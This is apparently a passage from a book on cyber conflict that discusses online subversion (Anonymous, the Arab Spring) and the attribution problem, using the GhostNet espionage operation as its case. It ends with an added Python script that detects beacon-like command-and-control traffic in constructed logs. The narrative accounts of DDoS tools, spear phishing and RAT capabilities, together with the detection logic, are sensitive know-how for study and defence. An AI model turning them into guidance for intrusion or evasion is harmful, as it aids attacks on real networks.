This statement was so general and broad as to be nearly meaningless. But its authors had little choice. The principles expressed in the document needed to be all-inclusive in order to offer a roof to anybody who self-identified with what had become a global network of protest. Building a planetary society and organizing for fruitful relationships among mankind and the earth seemed to do the trick. This leads to the second noteworthy feature.

The rise of the popular anti-globalization network curiously coincided with the rise of another popular global network: the Internet. Many activists, young and with experimental lifestyles, were early technology adopters. Naturally, they suspected a correlation between the new technologies and the new ideas they embraced so passionately. One example is Evan Henshaw-Plath, founder of the then-popular site http://protest.net. Shortly after Christmas 2001, Henshaw-Plath gave an interview to a graduate student. He commented on the relationship between the web and the movement, and mused that the former had enabled the latter:

The anti-globalization movement could not exist without the Internet. This is not to say that we wouldn’t be struggling over similar issues but the movement that we have now wouldn’t exist. We wouldn’t be making the connections and coalitions. We couldn’t organize such massive coalitions with almost non-existent overhead if we didn’t have email mailing lists and websites. I think the tactics of having very large broad protests with indymedia centers, conference spaces, counter conferences, legal protests, illegal protests, and direct action wouldn’t be possible without the net. 39

Henshaw-Plath probably overstated the point. The anti-globalization movement could probably exist without the Internet. The question was how the new media affected political activism. That question, how the global Internet impacted on the anti-globalization movement, naturally became a sexy topic for sociologists and political scientists, many of whom at least sympathized with the protesters. 40 One assumption was that the new media facilitated participation: “Political action is made easier, faster and more universal by the developing technologies,” one widely read article argued in 2002. New information technologies would “lower the costs and obstacles of organizing collective action significantly.” 41 By following simple yet detailed guidelines, the article continued, “all supporters can easily become real participants.” 42 The dotcom bubble, it seemed, had not burst in academia, where enthusiasm for the positive and possibly revolutionary impact of new information technologies refused to go away. 43 The Internet, many sociologists argued, enabled a collective identity, effective mobilization of participants, and the ability to network the organizations into a larger movement that would be more reactive as a result. Until the early 1990s, big hierarchical groups had a “fundamental” advantage, another prominent article argued in 2006. But by then, a decade later, the comparative advantage had shifted. “In the Internet age, the transaction costs of communicating to large audiences, of networking, and of working transnationally have diminished,” wrote one World Bank-based researcher about the anti-globalization movement, “while the advantages of nimbleness—of being able to respond swiftly to events as they unfold—have grown.” 44 As entry costs and organizational costs are lowered, new entrants, groups outside the establishment of public institutions, such as parties, labor organizations, or unions, would benefit most in relative terms. By 2006, Twitter was founded and Facebook had opened to the public. The web continued to inspire entrepreneurs, politicians, academics, and activists. Social media had lowered the cost of organizing collective action, thus drastically increasing the number of people who would actively contribute to society and politics, and not just passively consume information as “couch potatoes,” a prominent web evangelist, Clay Shirky, argued in 2010. 45 But by then the anti-globalization movement had again outpaced sociological scholarship: the movement, despite its “fundamental advantage,” had quietly disappeared from the planetary stage. By the end of the 2000s, a decade after the Battle of Seattle, the fighters for global justice had scattered—this did not happen despite the rise of the Internet, but at least partly because of the rise of the Internet. To understand why, another subtle change of twenty-first-century subversion has to be considered.

These considerations about a proliferation of small causes lead to the second hypothesis: the more a subversive movement relies on multiple causes, new technologies, and networked communications, the more likely it is that this movement will be characterized by high membership mobility. At closer examination, several factors that go beyond the attractiveness of a dynamic cause increase the number and the frequency of members joining a new movement: the ease of finding out about the movement and its cause; the opportunity to participate at low costs; and the benefits of participation. One overarching factor, by contrast, is likely to determine whether participants terminate their subversive activity, independent of success or failure: the costs of ending the participation and leaving the “movement.” Of course other considerations influence an individual’s decision to continue supporting a subversive cause, for instance whether the movement is making progress, whether it has achieved any results, whether participation pays off in one way or the other, or whether there are other competing movements or better ways to make a difference. But all these motivations are contingent on the costs of leaving. In some cases, the increased ease of temporarily joining a movement and leaving that movement again represents a hard challenge to the leaders and organizers of subversive action.

An insightful example of high membership mobility is Anonymous, a loose and largely leaderless movement of activists that became visible to the larger public in 2008. The movement’s activities initially took place only online. These activities could be legal or illegal, for instance hacking into protected computer networks. But Anonymous’s activities remained entirely non-violent, in contrast to its brick-and-mortar predecessors like the ELF or the anti-globalization movement. Supporters concealed their identities and rallied around self-defined causes, often promoting free speech, agitating against censorship and government oppression. The movement’s motto was frequently posted at the end of announcements: We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us. By late 2010, Anonymous had become to protest what Wikipedia was for encyclopedias and Linux for software; an improved, open, and crowd-produced alternative: nimble and effective to the point of appearing dangerous to the establishment. That, at least, is how enthusiastic sympathizers and frightened critics alike saw the phenomenon. By mid-2011, Anonymous seemed to have peaked. A closer look at this curious movement exposes three tender spots that are of general interest for the study of subversive social movements.

The first feature is the movement’s internal fissures and contradictions. Anonymous has, in simplified terms, two main streaks that reflect the movement’s lopsided rise: crude entertainment and political activism. Anonymous initially rose from the raunchy online message board 4chan, an online platform and image board with forced anonymity visited by more than 20 million unique visitors a month. The original activists were in it for the laughs, the “lulz.” Lulz is a concept related to Schadenfreude, derived from a plural of “lol,” which stands for laugh-out-loud. 46 An example was Anonymous’s “YouTube porn day,” a concerted prankster raid on 20 May 2009 where hundreds of pornographic videos were defiantly uploaded to the popular video-sharing site to retaliate against Google’s removal of music videos. 47 In a video titled “Jonas Brother Live On Stage,” a viewer commented: “I’m 12 years old and what is this?” The phrase, quoted in a BBC story, went on to become an Internet meme. Such trolling didn’t need to have any social or political dimension. It could just be crude and mean and entertaining. For instance “doxing” an innocent victim by hacking or tricking him or her and then posting embarrassing private pictures, ideally of body parts, on /b/, 4chan’s most popular and unmoderated forum, or on the victim’s Facebook wall, for family and friends to see. 48

On the other side of that internal divide are those who are genuinely driven by a political cause. Those who disagree with the ethics of this or that prank are called “moralfags” on /b/. This slur is also applied to politically motivated activism. One of the early major campaigns became known as “Project Chanology.” The op’s name was a portmanteau of 4chan and the name of the target, the Church of Scientology. Chanology was triggered by Scientology’s attempt to get YouTube to remove a weird promotional video with Tom Cruise that had allegedly been leaked and edited. Anonymous initially reacted with DDoS attacks on Scientology’s website, but it soon expanded the campaign. The Internet collective launched the operation publicly with its own YouTube video on 21 January 2008. 49 The high point of the Anonymous campaign was the wave of demonstrations that took place in front of the sect’s main centers worldwide. The protesters wore the now-famous Guy Fawkes masks, adopted from the film V for Vendetta. The global turnout on 10 February 2008 may have been as high as 8,000 protesters. The campaign was widely covered in the international press. “Oh fuck,” one famous photo of a group of anti-Scientology protesters read, “The Internet is here.” Scientology noticed that the Internet was here in unexpected ways: by receiving large numbers of unpaid pizzas, black faxes to drain printer cartridges, unwanted taxis, and prank calls. Some of the lulzy operations had a shallow political dimension, as the YouTube-porn day illustrates, and some of the political activism has retained an amusing side, as the Chanology shows. This mix was a recipe for success, and temporarily bridged the internal divide among the “Anons.”

The second feature is the movement’s low internal visibility. In late November 2010, the crowd on 4chan’s /b/ board was again jolted into action. After WikiLeaks published secret US diplomatic cables, PayPal and other financial firms announced that they would block payments to the whistleblowing start-up. Anonymous staged a few high-profile DDoS attacks in defense of Julian Assange’s outfit, most notably against PayPal, Visa, and Postfinance, a leading Swiss bank. Operation Payback, as it was known, received wide attention in the international press and Anonymous’s channels on Internet Relay Chat, better known by its acronym IRC, were brimming with new members. A number of follow-on operations, most notably the hacking of HBGary Federal, further increased the group’s visibility. Policy-makers began to be concerned about the dangerous hacker collective. Scholars and PhD students started dissecting the phenomenon. Books were published. 50 But this high public visibility of Anonymous contrasted sharply with a low internal visibility for those who decided to participate in its activities. A multitude of platforms, IRC channels, changing pseudonyms, and simultaneous communication in high volumes made understanding what was going on a challenge. Anonymous activists, naturally, remain anonymous—also amongst each other. This lack of visibility means that participants may not know how many people join an operation, why they join an operation, and most importantly who they really are. This situation, combined with the knowledge that many hacks and DDoS attacks were illegal, ultimately created distrust, paranoia, and fragility.

The third feature is Anonymous’s myth-making. Many part-time participants in Anonymous’s operations share a core tenet: the belief in the power of the collective, the “hive mind” or just “the hive.” This vision of the collective is an old and appealing one. Anonymous’s participants see themselves as a veritable popular force, as the masses of the web, a powerful sum of elements that would be weaker individually. Plus anonymity seemed to be the ultimate form of egalitarianism: everybody could be anybody, without hierarchy, without titles or degrees. The epitome of the hive was a voluntary Denial of Service Attack, with thousands of individuals joining a Twitter-coordinated collective attack against unsuspecting targets. To stimulate the hive mind, the virtual “weapons” would have fancy names like Warbot, Russkill, Good Bye v3.0, or—to name an initially popular tool—the Low Orbit Ion Cannon, the LOIC. 51 The problem was: hive-distributed denial of service attacks were far less effective than many assumed. The collective DDoS attack on PayPal.com on 8 December 2010 illustrates this. On that day about 4,500 participants who had downloaded the LOIC and set it on the “hive option” joined the collective to take down the payment service provider who had been critical of WikiLeaks. But when Twitter and 4chan exploded with excited posts of “*FIRE FIRE FIRE FIRE*,” nothing happened. Only when one botnet operator joined the attack by commandeering more than 30,000 zombie computers to contribute did PayPal’s website go down. The legitimate owners of these many thousands of hijacked computers did of course not know that the temporary slowdown of their Internet connection meant they were participating in an attack on PayPal. 52 The Anonymous hive, likewise, did not know that one single botnet operator outgunned them nearly ten-to-one. Remarkably, a tiny elite of Anonymous hackers did not want to discourage the collective by mentioning the botnets. The myth of the hive may be misleading, but it is also very powerful. It kept morale high—but it also ensured that there was fluctuation among the participants. “What sets Anonymous apart is its fluid membership and organic political evolution,” wrote Gabriella Coleman, an anthropologist who has tracked the Anonymous phenomenon for many years. The movement has neither a strategy nor structures in place that could set a strategy. It is tactically driven. “Anonymous has no consistent philosophy or political program,” Coleman observed. 53 This observation leads to the final thesis.

The third hypothesis follows from the preceding theoretical and empirical observations on subversion: the more a subversive movement relies on new technologies and networked communications, the more difficult it will be to establish an internal coercive order. An internal coercive order must not always express itself in actual acts of punishment, as the chapter on violence explored in some detail. But the knowledge of such an enforced order is what endows rules and guidelines of behavior with authority—it is this internal order that differentiates a movement from a group. Enforced orders also enable strategic decisions by preventing random membership mobility and thus facilitating a coherent purpose that may overcome a movement’s cause-driven character.

For any subversive movement, there are two principal sources of cohesion, an internal coercive order or external coercion. An extreme example of the former, internal enforcement, is a drug cartel or a mafia organization: even if a disillusioned member decides to leave his or her group by cooperating with law enforcement, they would still have to fear the group’s punishment—that punishment is an expression of the group’s ability to maintain an internal coercive order. The other source of cohesion, paradoxically, is the strength of the established system that a subversive movement is up against. But as soon as the despised coercive order collapses, the frail unity of a web-enabled movement is likely to collapse as well. Online subversion may facilitate the goal of collectively undermining trust in an established order, but it may also obstruct the broader aim of collectively establishing trust in the new order that is to be put in its place.

Powerful examples can be found in the way the Arab Spring of 2011 was triggered. Initially the Arab youth movements that shattered the established order in Tunisia, Egypt, Libya, Yemen, and elsewhere had a strong web presence on social media platforms. One example from Egypt, the second country to revolt against its old regime, is instructive. Wael Ghonim, an Egyptian Google marketing executive who was based in Dubai at the time, offered an inside view of one of the Facebook groups that helped trigger the revolution of 25 January 2011 in an autobiographical book, Revolution 2.0. 54 Ghonim had been the administrator of Kullena Khaled Said, a Facebook group that formed spontaneously in order to protest against the fatal beating of a young Egyptian man at the hands of the secret police. In the early subversive stages of what would later become a revolution, Internet forums, but mostly Facebook and to a lesser extent Twitter, helped coordinate small activities, such as a human chain along the corniche in Alexandria and “silent stands” of protestors, dressed in black. The social network offered a platform for planning as well as after-action-deliberation. Some posts later received thousands of “likes” and comments, and hundreds of thousands read the messages. 55 But most importantly, Facebook helped middle-class Egyptians understand that they were not alone in their frustration, and that there was a real potential to stage protests that were too large for the government to suppress by force. The majority of Egyptian Facebook users joined the online protest under their real names, by becoming a “member” of a specific Facebook group, by “liking” that group’s status update, or by writing a short comment—such small expressions of solidarity were not enough to jolt the security forces into action (if they even noticed).

But such small expressions of solidarity were enough to begin undermining the trust that many if not most Egyptians had in the efficiency of the secret police, the confidence they had in the efficiency of the state’s coercive order—or, put inversely, it increased the prospective protesters’ confidence in the uprising. The Facebook coordination combined a potent mix of anonymity and real names: the moderators of various Facebook groups that helped spark the unrest remained anonymous, trying to evade the prying eyes of the state’s security forces, but the mass of those who “liked” the posts and commented were not anonymous. Real names lent a reality and urgency to the phenomenon that would have been difficult to achieve anonymously. On 25 January, protesters had planned to take to the streets and to Tahrir Square for the first time in very large numbers. Going to that preannounced demonstration meant taking considerable personal risk. The authoritarian regime would not stand idly by, and had mobilized large numbers of security forces. The hope of the Facebook-organized protest movement was to overwhelm the police and thugs hired by the regime with even larger numbers of peaceful protesters. Individuals, if they turned out in numbers that were large enough, would be protected by the sheer mass of the demonstration.

But the step from online to offline protest had momentous consequences. Once the initial spark started a larger political movement, street protests gained a revolutionary dynamic that could not be stopped, neither by Hosni Mubarak’s clumsy shutdown of the Internet in Egypt nor by the brutality of the state’s security forces. This remarkably fast initial mass-mobilization seemed possible only through online social networks by savvy individuals like Ghonim. But until the very last moment on 25 January, even Ghonim and the other organizers did not know if their work would create the turnout they had hoped for: “We could not believe our eyes,” he wrote afterwards, recalling his surprised arrival at the main protest site. “I began tweeting like a madman on my personal account, urging everyone to come out and join the protest.” 56 But by then it was probably already too late for tweets: once the uprising had manifested itself in the street, the significance of social media instantly diminished. Facebook proved highly efficient in undermining the trust in the state’s monopoly of force and the regime’s ability to crush the protests; but the web had little to offer after that was accomplished. Building trust in new political institutions is an entirely different matter.

This chapter has argued that subversion is a useful concept to understand the potential and limits of activism in cyberspace—it is an old idea that manages to overcome the debate’s focus on violent methods and opens the comparison to resistance movements with limited, non-revolutionary goals. These shifts in perspective help to understand how new technologies are changing subversive activism. 57 Three hypotheses were introduced to capture that change: that subversion has become more cause-driven; that subversion is characterized by higher levels of membership-mobility; and that subversive movements find it more difficult to exert organizational control by erecting an internal enforced order. If these conclusions are accurate, cynics may conclude, then “cyber subversion” does not represent a formidable and perhaps even existential challenge to modern, liberal democracies. Such a conclusion would be naive and short-sighted. But the real challenge will come as a surprise to many: the challenge is not effectively stamping out subversion; the challenge is finding the right balance that maintains the fragile and hard-to-achieve degree of healthy subversion that characterizes the most successful liberal democracies and the most successful economies.

Subversion, in contrast to what some security scholars seem to think, is not principally illegal and it is not even principally illegitimate—only the most extreme forms of subversion are. The above examples were such moderate forms, and they were deliberately chosen for that reason. Understanding subversion’s extreme form requires understanding its moderate relatives first. Ideas and activities acquire subversive character not through inciting violence while remaining non-violent, but when these activities undermine and erode established authority. This thought immediately leads to a conclusion that is as surprising as it may be discomforting for most students of political violence: subversion may not just remain entirely non-violent; it may remain entirely within the boundaries of the law, especially in free and open democracies. In sharp contrast to Kitson’s ideas, neither non-violence nor illegality can successfully delineate subversive activity in its earliest stages. More in line with Agnoli’s ideas, subversive thought is not necessarily radical or militant, but it is almost always political and often embraces progress. Put differently, democracies are political systems designed to accommodate a certain amount of subversive activity—if warranted even by changing its legal and possibly its constitutional foundation. Subversion therefore spans the philosophical and the practical; the legal and the illegal; the non-violent and the violent; and the non-revolutionary and the revolutionary. Most importantly, it can be regenerative or it can be degenerative.

Figure 2: schematic graph of four types of subversion.

In any democratic political system, some degree of subversive activity is a necessary precondition of a free, open, and critical polity. The side effect must not be undesirable let alone destructive; subversion may be a constructive social force that is highly desirable from a systemic point of view. Productively challenging established authority helps bring about a dynamic, adaptive, and innovative culture—in business, scholarship, and politics. Some of the demands of students and protesters in the 1960s and 1970s, such as the end of racial discrimination, or later the promotion of gay rights, were subversive at the time in the United States and Western Europe, but were broadly accepted across the political spectrum a few decades later. It is a mainstay of capitalism that even established market leaders should be constantly challenged to stay innovative and drive competition. As soon as a firmly established authority, be it political or economic, is shielded from all criticism and challenges, it is likely to become stale, inert, and complacent.

This raises a more elementary issue: the question of when subversion flips. When and how subversion flips from the regenerative and legitimate expression and the articulation of dissent to regression, illegality, and violence—or indeed the other way round. In any democratic state, the boundary between what is considered legal and what is considered illegal is always the outcome of ongoing political debates that shape a state’s legislative measures and its laws. The line between regenerative and degenerative subversion is forever blurred and the subject of fierce disputes on both ends of any society’s political and cultural spectrum. Here time is of the essence. Subversive movements, for instance the anti-globalization movement or the “Occupy” phenomenon, may appear limited, isolated, extreme, or inconsequential, especially to conservative observers in the context of their time. But perspectives and interpretations may change slowly and imperceptibly over time. The conclusion is that it is difficult to assess subversion as it happens; some historical shifts are hard to spot in real time. 58 Yet one historical trend is clear: in liberal democracies, subversion has been successfully legalized and institutionalized. 59 Three examples serve to make this point.

Subversion has been institutionalized in academia. Scientific progress itself relies on periodically overthrowing established knowledge in scientific revolutions, so-called “paradigm shifts,” as the historian of science Thomas Kuhn famously outlined. 60 In some disciplines scholarly practice did not remain implicitly subversive, but turned explicit. As postmodernism rose to prominence in the 1980s and 1990s, it became possible for scholars who crafted subversive theories to make a career in the establishment of philosophy, sociology, and adjacent disciplines, and, rather ironically, to become part of an increasingly dominant order in their own right. By the early 2000s, for instance, the language of subversion had become so common in cultural studies that scholars began avoiding verbs like “undermine,” “erode,” and “deconstruct” because in the wider field of cultural studies these phrases had been overused and had become stale. 61 Writing too subversively could narrow a funding proposal’s chances for success—not because the proposed ideas were running the risk of being too radical, but of being too bland.

Subversion has also been institutionalized in literature and art. In a much-noted 1981 study, Fantasy: The Literature of Subversion, Rosemary Jackson highlighted the critical and subversive potential of fantastic literature. The fantastic, as Jackson saw it, may trace the unsaid and the unseen of a society’s cultural and political established order, that which has been silenced, concealed, and covered. Telling a story within the bounds of the rational and the accepted would imply using the language of the dominant order, thus accepting its norms and contributing to keeping the “dark areas” covered by the dominant discourse. Literature and art, not just of the fantastic kind, often playfully explore the limits of the established. Irene Rima Makaryk’s Encyclopedia of Contemporary Literary Theory has a two-page entry for Subversion. The encyclopedia understands subversion as an articulation, as the “‘becoming visible’ of any repressed, forbidden, or oppositional interpretation of the social order.” 62 Cultural critics and literary scholars are fond of quoting the controversial German philosopher and philologist Friedrich Nietzsche, whose writings inspired a great deal of critical philosophical and political thought in the twentieth century. “So what is truth?” asked Nietzsche, and then responds forcefully,

A moving army of metaphors, metonymies and anthropomorphisms, in short a summa of human relationships that were poetically and rhetorically exaggerated, transposed, and beautified until, after long and repeated use, a community considers them as solid, canonical, and binding. Truths are illusions whose illusionary nature has been forgotten; metaphors that have been used up and have lost their imprint; coins that have lost their image and that now appear as mere metal, no longer as coins. 63

For Paul De Man, a founding figure in literary theory, Nietzsche’s 
passage stands for “the necessary subversion of truth.” 64 

Perhaps most importantly, subversion is institutionalized in liberal constitutional orders. An impressive example is the well-known right to resistance enshrined in some liberal constitutions. In 1968, Germany added article 20, paragraph 4, to its basic law, or Grundgesetz. The clause states that the Federal Republic of Germany is a democratic and social state, that all power is ultimately in the hands of the people, and that the constitutional legal coercive order, the executive branch, and law enforcement are bound by the law. The basic law then adds, “All Germans have the right to resist anybody who attempts to remove this order, if no other courses of action are available.” 65 This right to resistance was designed as a safeguard against an abuse of power at the hands of the government and its law-enforcement agencies. The law is informed by the idea that, during a state of exception (Notstand), the State itself may undermine the constitutional order. The king can do wrong. In times of perceived constitutional peril, governments with an authoritarian bent react with crackdowns, censorship, or emergency laws to mounting dissent. Authoritarian regimes see the rise of Internet-fueled subversion as such a dangerous trend that it needs to be met with aggressive countermeasures. For liberal democracies, the problem is far more delicate: they need to find out how to rebalance the right to resistance and civil liberties with national security. By overshooting the target in a new and confusing digital environment, liberal states may inadvertently push previously legitimate civic action into the realm of illegal subversion. “The restoration of the old order constitutes a permanent risk,” Johannes Agnoli told his students in Berlin on 31 October 1989, just days before the Berlin Wall fell. The old Marxist closed his lecture that Tuesday by warning of unknown innovations that would again and again tempt those in power: therefore “the theoretical and practical work of subversion will never be finished.” 66

There is perhaps no better example of the retreat of violence through cyber attacks than the attribution problem. To understand why, some background is needed. Conflict, like so many other human interactions, occurs online where possible. The resulting changes, this book has argued, are mostly overestimated in their breadth and depth and in their overall significance. But that does not mean that no fundamentals of human conflict are being altered. Nearly all political cyber attacks on the empirical record—whether they were done for purposes of espionage, sabotage, or subversion—have one feature in common, as the cases discussed in this book illustrate. That feature of digital conflict represents a fundamental, and in many ways disturbing, change when compared to political confrontations in earlier, analogue times, be they violent or non-violent: that change is the attribution problem.

Mike McConnell was director of the National Security Agency from 1992 to 1996 and later George W. Bush’s director of National Intelligence until 2009. About a year later, in February 2010, he gave an interview to The Washington Post. Admiral McConnell portrayed the lack of traceability as a grave problem for US foreign policy and demanded far-reaching action. It is worth quoting America’s former top spy at length:

We need to develop an early-warning system to monitor cyberspace, identify intrusions and locate the source of attacks with a trail of evidence that can support diplomatic, military and legal options—and we must be able to do this in milliseconds. More specifically, we need to reengineer the Internet to make attribution, geolocation, intelligence analysis and impact assessment—who did it, from where, why and what was the result—more manageable. 1

Two-and-a-half years later, on 11 October 2012, Leon Panetta gave a much-noted speech to business leaders at the Intrepid Sea, Air and Space Museum. The venue had a powerful subtext: the museum is on a decommissioned Essex-class aircraft carrier, the USS Intrepid, today floating off a pier in the Hudson River in New York City. The Second World War-tested Intrepid sports a number of high-powered military airplanes on deck, most prominently an early model of an SR-71 “Blackbird,” an advanced strategic spy plane that holds several speed and high-altitude records. That Thursday in New York, the US Secretary of Defense, also a former director of the CIA, was uniquely well placed and well qualified to talk about a novel threat facing the nation, cyber attack. “The department,” Panetta continued, “has made significant advances in solving a problem that makes deterring cyber adversaries more complex: the difficulty of identifying the origins of an attack.” This statement was a historic first. Technicians and computer scientists say that a clever attacker can successfully avoid identification. Indeed, the US government itself had just done so with several high-profile attacks under the code-name Olympic Games. But the secretary’s speech that day painted a very different picture:

Over the last two years, the department has made significant investments 
in forensics to address this problem of attribution, and we are seeing 
returns on those investments. Potential aggressors should be aware that the 
United States has the capacity to locate them and hold them accountable 
for actions that harm America or its interests. 2 

The secretary’s rhetoric included a measure of bluff and bluster, but how much is difficult to gauge. Assessing the potential countermeasures that McConnell and Panetta ominously referred to first requires understanding the problem at hand. That problem is simple: under what conditions can a cyber attack be attributed to an agent? Are there any trends and possible changes that may affect the attribution problem by making it easier or more difficult to solve? The answer to this simple question is complicated and surprising.

This chapter argues that the attribution problem, at its core, is a political problem more than it is a technical problem. “Reengineering” the Internet, as McConnell suggested, is not only unrealistic, it would not even solve the problem at hand. 3 There is no purely technical solution to the conundrum of attribution, and this is highly unlikely to change. The attribution problem has a territorial dimension, and therefore turns into a political problem. In the vast majority of cases of international political cyber attacks, especially when they are professionally executed, the attribution problem therefore cannot be solved—unless the political stakes are high enough. This leads to a counterintuitive insight: the attribution problem is a function of an attack’s severity. The following pages make clear why.

The argument will be established in four quick steps, each of which is 
illustrated by at least one representative example. This chapter first puts 
the attribution problem in the appropriate context; it then distinguishes 
three layers of the attribution problem; the difficulties of attribution 
under near-optimal conditions will then be discussed; and finally the 
offender’s perspective on the attribution problem will be considered. 

The attribution problem is not new in itself. Punishing an offender, or threatening to do so, requires identifying that offender. The problem is well known in criminal justice. Once a criminal offense has been committed, the prosecution has to find a suspect, possibly arrest her, establish acceptable criminal evidence, and ultimately sentence the criminal to be punished. The attribution problem is less well explored in international relations, where conventional state-on-state offenses mostly left little doubt about the attacker’s identity. Even in the case of surprise attacks, the prized questions were usually when and from where the attack was coming, not from whom. Military history knows no major battles where the enemies did not reveal themselves. In the context of the conventional use of armed force, the attribution problem arises in two principal situations. One is the use of covert operations. The United States, for instance, tried to hide its hand in the support of the Afghan mujahedeen in the 1980s. Iran has been trying to conceal its support for Hezbollah. Examples of covert operations abound, especially in the context of proxy conflicts where third parties intervene. The other principal situation is political violence and terrorism. Individual attacks cannot always be easily and immediately attributed to one specific militant group or actor when no group claims credit in a credible way. Two prominent examples are the 1988 attack on Pan Am Flight 103 (the Lockerbie bombing) and the 1995 Oklahoma City bombing, where Timothy McVeigh tried to hide his role. Yet in the vast majority of cases perpetrators do claim credit, especially when the attack was a lethal and spectacular one. 4 Both the history of covert operations and the history of terrorism know attacks where no enemies revealed themselves, and where none could be clearly identified in hindsight. Yet such cases are rare. 5 When hard weapons are used, non-attribution is the exception, not the rule—when malicious software is used, non-attribution is the rule, not the exception. This important contrast makes clear that cyber attacks are especially well suited for two activities that have always tended towards the shadows, crime and espionage.

The so-called GhostNet incident ideally illustrates the attribution problem in the context of a complex cyber espionage operation. In 2008, the Dalai Lama suspected that his staff was being spied on. The spiritual leader had to flee Tibet in 1959. For the past half-century he has lived and worked in exile in India. The Dalai Lama has often crossed the Chinese government, diplomatically as well as with wider publicity campaigns. In the 1990s, the spiritual leader started to make use of the web to publish talks and speeches and later to reach out to potential supporters. But over time, the web also offered his enemies a way to strike back. Early in 2008, the Tibetan leader’s office invited two experts to help examine their computers in Dharamsala in a thorough forensic investigation. Two researchers came, Greg Walton from the Citizen Lab, a group of information security researchers at the Munk Center for International Studies at the University of Toronto in Canada, and Shishir Nagaraja, a computer scientist of Indian origin working with the University of Cambridge. They found that the holy Tibetan leader was indeed under attack. Ron Deibert, head of the Citizen Lab, who broke the story in March 2009, called it GhostNet. GhostNet was indeed a sophisticated international spying operation, probably of Chinese origin. In less than two years, the shadowy network had infected 1,295 host computers in embassies, international organizations, news media, and NGOs in 103 countries, and ministries of foreign affairs were also affected, including the foreign offices of Iran, Bangladesh, Latvia, Indonesia, the Philippines, Brunei, Barbados, and Bhutan. The Dalai Lama’s offices in India, Brussels, London, and New York were also infected with the clandestine spying software. The cyber espionage operation uncovered by the visiting academics turned out to be the largest of its kind ever uncovered, at least in terms of the countries affected by the threat. The malware was able to take full control of infected computers, including searching and downloading documents, logging keystrokes, and even covertly activating PC cameras and microphones and capturing the recorded information. 6

The attack had two vectors. Like many targeted attacks, it employed social engineering, in the form of “spear phishing,” to lure unsuspecting victims to open email attachments. One email, for instance, sent on 25 July 2008, pretended to come from campaigns@freetibet.org and allegedly contained the translation of a “freedom movement ID book” in the form of an attached .DOC file. If the user opened the attachment, the malicious file would exploit a vulnerability in Microsoft Word and install the espionage malware on the user’s computer. 7 Some malicious emails allegedly came from monks or other Tibetan co-workers, thus making them more trustworthy. Even worse, the attackers also stole some emails in transit and replaced legitimate attachments with infected files. 8 The other way attackers would gain entry into a targeted system was by getting the user to visit a website that contained malware which was then downloaded. Infected computers would routinely get in touch with a command-and-control server and possibly receive instructions for the next step, such as installing a remote access tool.

Technically, the operation relied mainly on backdoors, more precisely 
a Remote Access Trojan (RAT), especially a modified version of a tool 
called Poison Ivy or GhOst RAT (spelled with a zero, not the letter “o”), 
hence the name GhostNet. Once the GhOst RAT was installed on a 
targeted machine, the infected computer would periodically try to 
connect to a specific IP address, and as soon as the attackers had fired up 
the remote access Trojan on the infected machine they would be able to 
use a wide range of commands, including using the file manager, taking 
screen shots, logging keystrokes, using the computer’s webcam, and the 
built-in microphone. The attackers were also able to execute programs 
on infected machines. This was supposed to happen clandestinely. But 
one monk reportedly happened to look at his screen when Outlook 
Express fired up on its own and started sending emails to his contacts 
with toxic documents attached. 9 
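
The behaviour described above, an implant that periodically tries to connect to a specific address, is something a defender can look for in ordinary proxy or firewall logs. The script below is an added example written for this page; it is not code from the GhostNet report or from the Citizen Lab. It parses a handful of constructed log lines (the format, hosts and timestamps are all made up) and flags source/destination pairs whose connection gaps are nearly constant, which is how regular beaconing looks next to the irregular rhythm of human browsing.

```python
"""Flag hosts that contact the same destination at a suspiciously regular interval.

Constructed example: the log lines below are made up for illustration and do
not come from the GhostNet investigation.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed firewall/proxy log lines: "<ISO timestamp> <src> -> <dst>:<port>".
# 10.1.2.15 talks to 203.0.113.9 every five minutes (beacon-like) and to
# 198.51.100.20 at irregular times (browsing-like).
SAMPLE_LOG = """\
2008-07-25T09:00:03 10.1.2.15 -> 203.0.113.9:443
2008-07-25T09:01:17 10.1.2.15 -> 198.51.100.20:80
2008-07-25T09:05:02 10.1.2.15 -> 203.0.113.9:443
2008-07-25T09:07:44 10.1.2.15 -> 198.51.100.20:80
2008-07-25T09:10:04 10.1.2.15 -> 203.0.113.9:443
2008-07-25T09:15:03 10.1.2.15 -> 203.0.113.9:443
2008-07-25T09:20:02 10.1.2.15 -> 203.0.113.9:443
2008-07-25T09:23:10 10.1.2.15 -> 198.51.100.20:80
2008-07-25T09:25:05 10.1.2.15 -> 203.0.113.9:443
2008-07-25T09:30:03 10.1.2.15 -> 203.0.113.9:443
2008-07-25T09:41:00 10.1.2.15 -> 198.51.100.20:80
"""


def parse_log(text):
    """Return {(src, dst): [timestamps]} from the constructed log format."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, _, dst = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows


def beacon_candidates(flows, min_events=4, max_jitter_ratio=0.1):
    """Return flows whose inter-arrival times are nearly constant.

    The jitter ratio is the population standard deviation of the gaps divided
    by their mean; a timer-driven implant stays close to zero, a person does
    not. Flows with fewer than `min_events` connections are skipped because a
    handful of gaps says nothing reliable about regularity.
    """
    hits = []
    for (src, dst), stamps in flows.items():
        if len(stamps) < min_events:
            continue
        stamps = sorted(stamps)
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        ratio = pstdev(gaps) / avg
        if ratio <= max_jitter_ratio:
            hits.append({"src": src, "dst": dst, "count": len(stamps),
                         "period_s": round(avg), "jitter_ratio": round(ratio, 3)})
    return hits


if __name__ == "__main__":
    for hit in beacon_candidates(parse_log(SAMPLE_LOG)):
        print(hit)
```

On the constructed input only the 203.0.113.9 flow is reported, with a period of about 300 seconds. In practice the thresholds need tuning against the site's own baseline, since software updaters and mail clients also poll on timers; the value of the check is that it narrows the haystack before an analyst looks at what the destination actually is.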

